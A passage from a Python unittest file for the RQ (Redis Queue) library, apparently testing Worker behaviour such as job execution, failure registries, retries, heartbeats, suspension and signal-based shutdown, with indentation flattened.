self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
"""handle_job_failure() handles retry properly"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=2)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
# If job if configured to retry, it will be put back in the queue
# This is the original execution
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 1)
self.assertEqual([job.id], queue.job_ids)
# First retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([job.id], queue.job_ids)
# Second retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([], queue.job_ids)
def test_retry_interval(self):
"""Retries with intervals are scheduled"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=1, interval=5)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
registry = queue.scheduled_job_registry
# If job if configured to retry with interval, it will be scheduled,
# not directly put back in the queue
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
self.assertEqual(job.retries_left, 0)
self.assertEqual(len(registry), 1)
self.assertEqual(queue.job_ids, [])
# Scheduled time is roughly 5 seconds from now
scheduled_time = registry.get_scheduled_time(job)
now = datetime.now(timezone.utc)
self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signal are ignored and the work remain
# running, so set a signal to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job, queue)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
